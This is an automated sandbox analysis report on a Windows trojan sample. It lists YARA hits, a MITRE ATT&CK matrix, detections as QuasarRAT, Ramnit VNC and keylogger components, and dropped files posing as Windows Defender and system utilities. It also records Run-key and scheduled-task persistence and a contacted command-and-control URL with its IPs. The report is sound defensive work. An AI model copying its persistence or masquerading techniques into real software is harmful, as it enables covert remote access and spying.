Source: Yara match	File source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.c9ac50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1833408.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1808408.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.946249267.00000000007F7000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.720379201.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.945386236.00000000007C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.938560502.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.710171525.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.672198694.000000000175C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.708334830.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.710041588.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.708627891.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671945982.000000000175C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.720440716.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776203238.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.938070643.0000000000260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776024946.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.938168634.0000000000297000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vnc.exe PID: 6296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match	File source: dropped/vnc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\vnc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED

Contains VNC / remote desktop functionality (version string found)

Show sources

Source: CVbJSUXraQ.exe, 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp	String found in binary or memory: RFB 003.008
Source: vnc.exe	String found in binary or memory: RFB 003.008
Source: vnc.exe, 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp	String found in binary or memory: RFB 003.008
Source: svchost.exe	String found in binary or memory: RFB 003.008
Source: svchost.exe	String found in binary or memory: RFB 003.008
Source: CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp	String found in binary or memory: RFB 003.008
Source: SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	String found in binary or memory: RFB 003.008

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Native API11	Application Shimming1	Exploitation for Privilege Escalation1	Disable or Modify Tools1	Input Capture21	System Time Discovery1	Remote Desktop Protocol1	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job1	Create Account1	Application Shimming1	Deobfuscate/Decode Files or Information1	LSASS Memory	Peripheral Device Discovery11	Replication Through Removable Media1	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel22	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Scheduled Task/Job1	Process Injection612	Obfuscated Files or Information21	Security Account Manager	Account Discovery1	SMB/Windows Admin Shares	Input Capture21	Automated Exfiltration	Non-Standard Port11	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Registry Run Keys / Startup Folder1	Scheduled Task/Job1	Software Packing1	NTDS	File and Directory Discovery2	Distributed Component Object Model	Clipboard Data2	Scheduled Transfer	Remote Access Software1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Registry Run Keys / Startup Folder1	Masquerading11	LSA Secrets	System Information Discovery35	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol3	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion21	Cached Domain Credentials	Query Registry1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol14	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection612	DCSync	Security Software Discovery131	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Hidden Files and Directories1	Proc Filesystem	Virtualization/Sandbox Evasion21	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Process Discovery3	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	Application Window Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	System Owner/User Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Rename System Utilities	Keylogging	Remote System Discovery1	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery
Compromise Hardware Supply Chain	Visual Basic	Scheduled Task	Scheduled Task	Masquerade Task or Service	GUI Input Capture	System Network Configuration Discovery1	Exploitation of Remote Services	Email Collection	Commonly Used Port	Proxy			Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
CVbJSUXraQ.exe	74%	Virustotal		Browse
CVbJSUXraQ.exe	69%	Metadefender		Browse
CVbJSUXraQ.exe	87%	ReversingLabs	Win32.Trojan.Pwsx
CVbJSUXraQ.exe	100%	Avira	TR/Spy.Agent.zgvfh
CVbJSUXraQ.exe	100%	Avira	TR/AutoIt.tyemd

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\windef.exe	100%	Avira	TR/AD.Xiclog.nmpoi
C:\Users\user\btpanui\SystemPropertiesPerformance.exe	100%	Avira	TR/Spy.Agent.zgvfh
C:\Users\user\btpanui\SystemPropertiesPerformance.exe	100%	Avira	TR/AutoIt.tyemd
C:\Users\user\AppData\Roaming\SubDir\winsock.exe	100%	Avira	TR/AD.Xiclog.nmpoi
C:\Users\user\AppData\Local\Temp\vnc.exe	100%	Avira	TR/Hijacker.W
C:\Users\user\AppData\Local\Temp\windef.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\SubDir\winsock.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\vnc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\vnc.exe	84%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\vnc.exe	93%	ReversingLabs	Win32.Trojan.Carberp
C:\Users\user\AppData\Local\Temp\windef.exe	86%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\windef.exe	93%	ReversingLabs	ByteCode-MSIL.Backdoor.QuasarRAT
C:\Users\user\AppData\Roaming\SubDir\winsock.exe	93%	ReversingLabs	ByteCode-MSIL.Backdoor.QuasarRAT

Unpacked PE Files

Source	Detection	Scanner	Label	Download
5.0.svchost.exe.c60000.0.unpack	100%	Avira	HEUR/AGEN.1122256	Download File
5.0.svchost.exe.c60000.3.unpack	100%	Avira	HEUR/AGEN.1122256	Download File
7.2.CVbJSUXraQ.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1108767	Download File
10.0.SystemPropertiesPerformance.exe.a40000.0.unpack	100%	Avira	TR/Hijacker.W	Download File
10.0.SystemPropertiesPerformance.exe.a40000.0.unpack	100%	Avira	TR/AD.Xiclog.nmpoi	Download File
5.2.svchost.exe.c60000.0.unpack	100%	Avira	HEUR/AGEN.1122256	Download File
6.0.windef.exe.f10000.0.unpack	100%	Avira	HEUR/AGEN.1135947	Download File
10.2.SystemPropertiesPerformance.exe.a40000.0.unpack	100%	Avira	TR/Hijacker.W	Download File
10.2.SystemPropertiesPerformance.exe.a40000.0.unpack	100%	Avira	TR/AD.Xiclog.nmpoi	Download File
4.0.vnc.exe.ab0000.0.unpack	100%	Avira	TR/Hijacker.Gen	Download File
7.2.CVbJSUXraQ.exe.db0000.1.unpack	100%	Avira	TR/Hijacker.W	Download File
7.2.CVbJSUXraQ.exe.db0000.1.unpack	100%	Avira	TR/AD.Xiclog.nmpoi	Download File
4.2.vnc.exe.ab0000.0.unpack	100%	Avira	TR/Hijacker.Gen	Download File
7.0.CVbJSUXraQ.exe.db0000.0.unpack	100%	Avira	TR/Hijacker.W	Download File
7.0.CVbJSUXraQ.exe.db0000.0.unpack	100%	Avira	TR/AD.Xiclog.nmpoi	Download File
1.3.CVbJSUXraQ.exe.3800000.6.unpack	100%	Avira	TR/AD.MoksSteal.elw	Download File
5.0.svchost.exe.c60000.6.unpack	100%	Avira	HEUR/AGEN.1122256	Download File
1.2.CVbJSUXraQ.exe.db0000.0.unpack	100%	Avira	TR/Hijacker.W	Download File
1.2.CVbJSUXraQ.exe.db0000.0.unpack	100%	Avira	TR/AD.Xiclog.nmpoi	Download File
1.0.CVbJSUXraQ.exe.db0000.0.unpack	100%	Avira	TR/Hijacker.W	Download File
1.0.CVbJSUXraQ.exe.db0000.0.unpack	100%	Avira	TR/AD.Xiclog.nmpoi	Download File
6.2.windef.exe.f10000.0.unpack	100%	Avira	HEUR/AGEN.1135947	Download File
10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack	100%	Avira	TR/AD.MoksSteal.elw	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://0x21.in:8000/_az/	6%	Virustotal		Browse
http://0x21.in:8000/_az/	0%	Avira URL Cloud	safe
http://ip-api.com40l	0%	Avira URL Cloud	safe
http://schemas.datacontract.org/2004/07/	0%	URL Reputation	safe
https://dotbit.me/a/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
0x21.in	50.17.5.224	true	false		high
ip-api.com	208.95.112.1	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://0x21.in:8000/_az/	true	6%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ip-api.com/json/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://api.ipify.org/	windef.exe	false		high
http://freegeoip.net/xml/	CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, windef.exe, windef.exe, 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	false		high
http://ip-api.com40l	windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.datacontract.org/2004/07/	windef.exe, 00000006.00000002.713962745.00000000033C3000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp	false		high
http://api.ipify.org/3	CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, windef.exe, 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	false		high
http://ip-api.com/json	CVbJSUXraQ.exe, SystemPropertiesPerformance.exe, 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp	false		high
http://ip-api.com	windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp	false		high
https://dotbit.me/a/	CVbJSUXraQ.exe, SystemPropertiesPerformance.exe, 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
5.8.88.191	unknown	Russian Federation	56541	KOMETA-ASRU	false
50.17.5.224	0x21.in	United States	14618	AMAZON-AESUS	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	492794
Start date:	29.09.2021
Start time:	01:34:58
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 38s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	CVbJSUXraQ (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@33/5@3/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 40.2% (good quality ratio 33.8%) Quality average: 65.5% Quality standard deviation: 37.8%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 23.54.113.53, 184.24.20.248, 40.127.240.158, 20.50.102.62 Excluded domains from analysis (whitelisted): e11290.dspg.akamaiedge.net, e12564.dspb.akamaiedge.net, go.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, store-images.s-microsoft.com-c.edgekey.net, settings-win.data.microsoft.com, arc.trafficmanager.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, settingsfd-geo.trafficmanager.net Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing behavior and disassembly information. Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:36:08	Task Scheduler	Run new task: RtkAudioService64 path: C:\Users\user\btpanui\SystemPropertiesPerformance.exe
01:36:13	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run win defender run "C:\Users\user\AppData\Local\Temp\windef.exe"
01:36:14	Task Scheduler	Run new task: win defender run path: C:\Users\user\AppData\Local\Temp\windef.exe
01:36:14	API Interceptor	1x Sleep call for process: windef.exe modified
01:36:21	API Interceptor	549x Sleep call for process: winsock.exe modified
01:36:22	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run win defender run "C:\Users\user\AppData\Local\Temp\windef.exe"

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\windef.exe.log Download File
Process:	C:\Users\user\AppData\Local\Temp\windef.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1557
Entropy (8bit):	5.351891643737667
Encrypted:	false
SSDEEP:	48:MIHK5HKXE1qHiYHKhQnoNHmHKBfHKntHoxHhAHKzvQTH3:Pq5qXEwCYqhQnoNGqNqntIxHeqzcX
MD5:	E9163F5673A58133809F22228C6E27DD
SHA1:	236F6A2107AA2EA3092C50A94B72064FA435D4A9
SHA-256:	EA9B7A740D92C4113B89E33D9DBB0187CBBF36F2587AA5139421FDBC985EE53D
SHA-512:	F3124F6846C4730E04EE36698A88E966AEBBF6F7FCCD0C265A8BE183ADF6C641944B7FA35F0F320F65A36335697D55B44BD34B3494B228737FD63C80151229FF
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, Publi

C:\Users\user\AppData\Local\Temp\vnc.exe Download File
Process:	C:\Users\user\btpanui\SystemPropertiesPerformance.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	6144:k6laOx87Xnl7xKK3iDgExiOP+MrRmD+PQXhEHlIxJKqM01FloHJh7GIA4hVvi:k6YmenBMKSUlm+4arHlgJNGIA4hVvi
MD5:	B8BA87EE4C3FC085A2FED0D839AADCE1
SHA1:	B3A2E3256406330E8B1779199BB2B9865122D766
SHA-256:	4E8A99CD33C9E5C747A3CE8F1A3E17824846F4A8F7CB0631AEBD0815DB2CE3A4
SHA-512:	7A775A12CD5BCD182D64BE0D31F800B456CA6D1B531189CEA9C72E1940871CFE92CCD005938F67BFA4784AE44C54B3A7EA29A5BB59766E98C78BF53B680F2AB2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\vnc.exe, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: C:\Users\user\AppData\Local\Temp\vnc.exe, Author: Joe Security
